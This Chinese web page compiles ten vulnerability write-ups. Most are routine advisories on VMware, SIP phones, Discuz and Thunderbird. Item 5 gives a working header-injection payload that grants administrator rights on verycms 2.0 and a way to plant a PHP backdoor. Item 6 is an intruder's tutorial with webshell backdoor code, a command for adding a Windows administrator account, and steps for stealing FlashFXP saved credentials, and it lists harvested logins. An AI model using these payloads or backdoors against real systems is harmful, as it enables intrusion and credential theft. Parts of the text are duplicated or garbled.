VMware产品存在权限提升拒绝服务安全漏洞

豆子酱 分享 时间: 收藏本文

【简介】感谢网友“豆子酱”参与投稿,下面是小编精心整理的VMware产品存在权限提升拒绝服务安全漏洞(共10篇),仅供参考,大家一起来看看吧。

篇1:VMware产品存在权限提升拒绝服务安全漏洞

受影响系统: VMWare Workstation 6.x VMWare Workstation 5.x VMWare ACE 2.x VMWare ACE 1.x VMWare Player 2.x VMWare Player 1.x VMWare Fusion 1.x 不受影响系统: VMWare Workstation 6.0.3 VMWare Workstation 5.5.5 VMWare ACE

受影响系统: VMWare Workstation 6.x VMWare Workstation 5.x VMWare ACE 2.x VMWare ACE 1.x VMWare Player 2.x VMWare Player 1.x VMWare Fusion 1.x 不受影响系统: VMWare Workstation 6.0.3 VMWare Workstation 5.5.5 VMWare ACE 2.0.3 VMWare ACE 1.0.5 VMWare Player 2.0.3 VMWare Player 1.0.6 VMWare Fusion 1.1.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 28289 CVE(CAN) ID: CVE--5618,CVE--1364,CVE-2008-1340 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统,

VMware产品存在权限提升拒绝服务安全漏洞

, VMWare产品中存在多个安全漏洞,允许恶意的本地用户获得权限提升或导致拒绝服务。 在Windows 上运行的VMware产品产品可能错误的注册某些服务,允许用户获得权限提升。 运行在主机上的DHCP服务中存在拒绝服务漏洞;虚拟机通讯接口(VMCI)中存在内存破坏漏洞,如果对该接口执行了特殊的调用的话,就会耗尽内存,导致拒绝服务。 <*来源:Ray Hicken Martin O'Neal (bugtraq@corsaire.com) 链接:secunia.com/advisories/29413/ marc.info/?l=bugtraq&m=120585607602232&w=2 *>建议: -------------------------------------------------------------------------------- 厂商补丁: VMWare ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: www.vmware.com/download/ws/ www.vmware.com/download/ws/ws5.html www.vmware.com/download/ace/ www.vmware.com/download/fusion/ www.vmware.com/download/player/

篇2:Grandstream GXV3000 电话远程拒绝服务安全漏洞

受影响系统:

Grandstream GXV-3000 1.0.1.7

描述:

GXV-3000是潮流科技(Grandstream)基于SIP和H.264标准的下一代高级IP视频电话,

GXV-3000在处理特定的消息序列时存在漏洞,远程攻击者可能利用此漏洞导致设备不可用。

如果向GXV-3000电话发送了以下两个消息序列的话,就会导致设备拒绝服务:

X ----------------------- INVITE ------------------->GXV-3000

X <------------------ 100 Trying -----------------  GXV-3000

X <--------------- 180 Ringing ------------------- GXV-3000

X ------------- 183 Session Progress -------> GXV-3000

X <-----------RTP - FLOW ------------------------ GXV-3000

厂商补丁:

Grandstream

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.grandstream.com

篇3:VMWare中VMSA0005更新修复多个安全漏洞

受影响系统:

VMWare Workstation 6.5.x

VMWare Workstation 6.0.x

VMWare Workstation 5.5.x

VMWare ACE 2.5.x

VMWare ACE 2.0.x

VMWare Player 2.5.x

VMWare Player 2.0.x

VMWare Server 2.x

VMWare Server 1.x

不受影响系统:

VMWare Workstation 6.5.2

VMWare ACE 2.5.2

VMWare Player 2.5.2

VMWare Server 2.0.1

VMWare Server 1.0.9

描述:

VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统,

VMWare的VMSA-2009-0005更新修复了多个安全漏洞,本地或远程攻击者可以利用这些漏洞绕过某些安全限制、获得权限提升或导致拒绝服务,

1) 如果远程攻击者在TCP 912端口上向vmware-authd守护程序发送了超长的USER字符串的话,就会终止vmware-authd进程,本地非特权用户无法访问虚拟机。

2) vmci.sys驱动的IOCTL处理器没有正确地验证Irp对象相关的缓冲区数据,拥有管理权限的本地用户可以在host或guest系统上获得SYSTEM权限。

3) VMnc codec(vmnc.dll)在处理3以上类型的RFB消息时的错误可能允许特制的视频文件触发内存破坏。

4) VMnc codec(vmnc.dll)没有正确地处理ICM_DECOMPRESS驱动消息,特制RIFF块中所定义的超长dwSize元素可以触发堆溢出。

5) ACE共享文件夹功能中的错误可能导致无需管理权限便在guest上启用共享文件夹。

厂商补丁:

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

lists.vmware.com/pipermail/security-announce/2009/000054.html

篇4:Windows和Office存在五个安全漏洞

摘要:据外电报道,微软周二发出警告说,其Windows操作系统和Office软件存有五个“危急”安全漏洞, 可以通过这些安全漏洞控制用户的电脑,

目前,全球90%的电脑所使用的操作系统均为微软Windows操作系统,

针对上述安全漏洞,微软已经发布了相关安全补丁,这也是其每月发布安全公告的一部分。当安全漏洞可以让具有破坏性的互联网蠕虫病毒在用户未进行任何操作的情况下进行复制时,微软则定义该漏洞的级别为“危急”。

这五个安全漏洞中,有两个为Windows操作系统存在的安全漏洞,其余三个为早期版本的Office软件所存在的漏洞。由于越来越多的恶意软件以Windows操作系统及微软其他软件中的漏洞为攻击目标,因此近三年多时间微软一直致力于提高其软件的安全性及可靠性。

微软最新的安全补丁可以从网站www.microsoft.com/security

篇5:verycms2.0权限提升漏洞

code:

passport_client.php

function Loginipwrite($winduid){

global $db,$timestamp,$onlineip;

$logininfo=“$onlineip|$timestamp|6”;

$db->update(

“UPDATE pw_user SET lastvisit=thisvisit,thisvisit=''$timestamp'',onlineip=''$logininfo'' WHERE uid=''$winduid''”);

}

再看$onlineip是怎么来的

Global.php

if($_SERVER[''HTTP_CLIENT_IP'']){

$onlineip=$_SERVER[''HTTP_CLIENT_IP''];

}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){

$onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];

}else{

$onlineip=$_SERVER[''REMOTE_ADDR''];

}

$onlineip =substrs($onlineip,16);

十六个字节,够提升权限的了吧?

抓包提交

HTTP_X_FORWARDED_FOR: '',groupid=3,/*

嘎嘎,每个人都成了管理员鸟

另外还有一点非常非常鸡肋的问题,在php.ini中若short_open_tag = off时可以得到shell

看 register.php中的一段代码

if($rg_allowsameip){

if(file_exists(D_P.'data/cache/ip_cache.php')){

writeover(D_P.'data/cache/ip_cache.php',“<$onlineip>”,“ab”);

}else{

writeover(D_P.'data/cache/ip_cache.php',“<$onlineip>”);

}

}

我们注册的时候抓包提交 HTTP_X_FORWARDED_FOR 为 ?require($a);?

data/cache/ip_cache.php就变成了这样的形式

……

在php.ini中若short_open_tag = off, die 就可以被饶过,从而执行我们的后门,

verycms2.0权限提升漏洞

篇6:提升权限总结篇

作者: lis0

一.使用Magic Winmail 来提升权限

原创:lis0

环境:所有使用了Magic Winmail软件的服务器,前提你已经得到了一个webshell :)

Magic Winmail是一款很不错的mail server 软件,深受不少网站的青睐,主要是一些中小的网站。但是在笔者最近的一次渗透中发现,装有改软件的服务器,如果一旦被入侵者得到webshell就可以通过这个软件来提升权限,非常危险。

装有Magic Winmail的服务器会在系统上开启8080端口,对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。图1

www.bjtaekwondo.org.cn/liso/data/upfile/51_3_1089427435.gif

在装有Magic Winmail的文件夹下有

一个server的文件夹,其下有webmail文件夹。图2

www.bjtaekwondo.org.cn/liso/data/upfile/52_3_1089427458.gif

大家可以发现这个文件夹下是一些php脚本的文件。因为Magic Winmail这个软件可以解析php脚本,也真是我们利用这个漏洞来提升权限的得力帮手。发现这个方法实属偶然,本来我想在这个服务器上装个后门,怎么装呢? 由于本人思路比较怪。一般不会使用常规的方法,就在这个服务器8080端口上打主意了。这个Magic Winmail就是最佳地点。你在d:\\MagicW~1\\server\\webmail[我测试的机器上的物理路径]文件下随便放置php脚本,不管是脚本注入式的还是普通的php脚本,随便放! 而且lis0提示请放心大胆使用,不会有日志吗? 菜鸟了吧。一般系统被入侵,管理员到系统盘下又是md5校验又是脚本木马查杀的。他做梦也想不到我们的脚本会放在这个文件夹下,lis0推荐使用注入式的脚本或者是自己写的不被杀毒软件能K的脚本。我哪个脚本? Lis0使用的是angel写的一个up.php,又插入了一点东西。玩的时候,上传个自己修改过的脚本或者其它东东,很方便。日志呢?当然还是有的。不过还是在Magic Winmail文件夹下,到目前为止能到这个文件夹下查看日志的网管还真的是不多,除非看了这篇文章 :)

up.php的codz

if ($id==“1”){

system($cmd);

show_source($file);

copy($a,$b);unlink($a);

}

?>

$fname = $_FILES['MyFile']['name'];

$do = copy($_FILES['MyFile']['tmp_name'],$fname);

if ($do)

{

echo“上传成功

”;

echo “”.$SERVER_NAME.“”.dirname($PHP_SELF).“/”.$fname.“”;

} else {

echo “上传失败”;

}

?>

其实我们可以将如下的代码插入到Magic Winmail的index.php文件中去,它的功能已经构多了。加上lis0发现的漏洞。这就算是个最完美的后门了。

if ($id==“1”){

system($cmd);

show_source($file);

copy($a,$b);unlink($a);

}

?>

我们使用www.target.com:8080/index.php?id=1&YY=XX 就可以正大光明地访问我们的肉鸡了。好像这样做太黑了点:)

还没说漏洞呢?废话多了。将一个php的脚本放在d:\\MagicW~1\\server\\webmail下,图3

www.bjtaekwondo.org.cn/liso/data/upfile/53_3_1089427486.gif

然后正大光明地 net user lis0 lis0 /add & net localgroup administrators lis0 /add 这个就是哥们发现的漏洞,不相信, 让肉鸡来证明我说的是没错的啊。图4

www.bjtaekwondo.org.cn/liso/data/upfile/54_3_1089427600.gif

lis0“非常不情愿”给告诉你这个webshell是system级别的而不是你那个guest级别的东西。虽然同是webshell待遇却不同啊。至于你想要玩其它的东东的话,使用上面我提起的up.php上传应该是不成问题的,

然后在脚本的那个可爱的小框框中执行就ok了

如果使用asp脚本可以提升限权吗? 也放在Magic Winmail那个文件夹下。

我们可以分析一下如果Magic Winmail可以同时解析php和asp脚本的话,应该是可以的。不好意思Magic Winmail是不可以解析asp脚本的,Magic Winmail这边是php的世界。

我们这边简单地分析一个这个漏洞是如何产生的?我们可爱的网管在装Magic Winmail的时候肯定是以system级别的身份装的。当然Magic Winmail就继承了system级别的限权,而我们的Magic Winmail却可以解析php脚本,想当然我们可爱的php脚本就是system级别的脚本了。这个Magic Winmail软件有点像咱国产Netbox的味道。

看看我们分析的对不对,于是我上传了个php探针,看看它到底是怎么回事情。

图5 www.bjtaekwondo.org.cn/liso/data/upfile/56_3_1089427756.gif

看到了没~乖乖

system级别的 & 而且无被禁函数 & 允许/最大 32M & lis0高兴ing。我个人认为这个一个最完美的php脚本后门放置地点,随意发挥你的php才华。好了就这么多了,希望能对大家渗透有所帮助。

解决方法:将Magic Winmail所在盘作相应处理,限制guest限权的用户访问。

声明:由于该方法对于不少人来说可谓是一大惊喜,放置后门加提升限权可能带来不良影响。所作的测试的脚本已经完全删除。无聊人士请勿对号入座。

二.使用FlashFXP来提升权限

作者: lis0

最近各位一定得到不少肉 :),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙招了。

其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。

其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问题吧。

其三,通过替换系统服务来提升。

其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。

本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)

本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id=1 好家伙,还在!高兴ing

图1

于是上传了一个asp的脚本的后门,怎么提升权限呢?

在这个网站的主机上游荡了N分钟,在C:\\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。

如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?

于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp在站点中打开站点管理器一项。乖 乖发财了

对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本木马~ 呵呵。

说了半天这提升权限的事情一点没讲啊

不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!

又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。

现在的星号密码会不会也是加了密的?看看就行了呗。

怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧

下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵

密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+

用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69

(上述部分密码和用户名已经作了必要的修改)

这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到的。

我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到flashfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。

篇7:Linux平台上的VMware vmrun 本地权限提升漏洞及修复

影响版本:

VMWare Workstation 7.x

VMWare Workstation 6.x

漏洞描述:

VMware VIX API可协作您编写虚拟机自动化操作的软件和脚本,运行程序或管理客户机操作系统中的文件,VMware Workstation是一款功能强大的桌面虚拟计算机软件,提供用户可在单一的桌面上同时运行不同的操作系统,和进行开发、测试 、部署新的应用程序的最佳解决方案。

Linux平台上的VMware “vmrun”在实现上存在本地权限提升漏洞,攻击者可利用此漏洞造成权限提升,

此漏洞源于vmrun程序错误地从某些目录中加载库,造成以当前运行vmrun的用户权限执行任意代码,使程序加载恶意共享库。

<*参考

Tim Brown (securityfocus@machine.org.uk)

marc.info/?l=full-disclosure&m=130146421004752&w=2

*>

厂商补丁:

VMWare

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.vmware.com

篇8:Cisco 7940 Phone SIP 消息远程拒绝服务安全漏洞

受影响系统:

Cisco IP Phone 7940

描述:

Cisco 7940型IP电话是一种多功能通讯设备,通过IP网络传递语音信号,

Cisco 7940在处理特定的请求序列时存在漏洞,远程攻击者可能利用此漏洞导致设备不可用。

如果向Cisco 7940 IP电话发送了以下3个消息序列的话:

X ------------------------- INVITE ----------------------->Cisco

X <--- 481 transaction does not exists ----- Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------------- OK ------------------------- Cisco

X <--- 481 transaction does not exists ----- Cisco

X ------------------------- OPTIONS-------------------->Cisco

或发送以下10个消息序列的话:

X ------------------------- INVITE ----------------------->Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------- 200 OK ------------------------- Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- INVITE ----------------------->Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------- 200 OK ------------------------- Cisco

X ------------------------- INVITE ----------------------->Cisco

X <----------------100 Trying ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 404 Not Found ------------------ Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

X ------------------------- OPTIONS-------------------->Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

就会导致设备重启,

厂商补丁:

Cisco

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.cisco.com/warp/public/707/advisory.html

篇9:Discuz存在SQL注入漏洞会员可提升权限

漏洞类型:SQL注入

危险等级:高

涉及版本:Discuz! 4.0.0 Discuz! 4.1.0

漏洞描述

由于Discuz! 对于数据没有进行严格过滤,可导致用户使用特殊工具伪造非法数据并注入SQL语句,获取论坛管理员权限,

虽然PHP此漏洞仅仅限于PHP5版本的服务器环境,但是经过Freediscuz! 团队成员测试,PHP4用户同样受到此漏洞威胁,且此漏洞亦威胁PHPWIND论坛程序。提醒广大论坛管理员尽快进行漏洞修补。

经过测试,以下Discuz!用户不受此漏洞影响,使用过0801补丁的用户不受影响,全新安装Discuz!_4.1.0_SC_GBK 0810 FD修补版的用户以及Lite Beta 2用户不受影响,Discuz! 5.0 RC1,RC2用户不受影响,

修补办法

尽快升级论坛至Discuz! 5.0 RC2。

对于不想进行论坛升级的用户,请使用本站发布的Discuz! 4.1.0 补丁。

全新安装用户可以下载Discuz! 5.0 RC2或者Discuz!_4.1.0_SC_GBK 0810 FD修补版。

备注说明

由于该漏洞属于高危险级别的安全漏洞,且涉及用户数量较大,为保证多数用户的安全和利益,我们决定不公布修补该漏洞的手工方法,以免被他人利用。Freediscuz 亦不会公布具体攻击办法和漏洞细节,有此意向的用户请勿骚扰Freediscuz Team成员。

篇10:thunderbird iframe javascript存在拒绝服务漏洞其他漏洞

受影响系统:mozilla thunderbird <= 1.0.7不受影响系统:mozilla thunderbird 1.5描述:

thunderbird是一款功能强大的邮件客户端,支持imap和pop邮件协议及html邮件格式,

thunderbird对html格式邮件的处理上存在问题,远程攻击者可能利用此漏洞在客户端机器上执行恶意脚本代码。

thunderbird的wysiwyg渲染引擎没有充分地过滤javascript脚本,允许向iframe标签的src属性中写入javascript,

这可能导致即使禁用了javascript的话,在用户编辑邮件或回复邮件时也可执行脚本或导致拒绝服务。

关 键 字:其他漏洞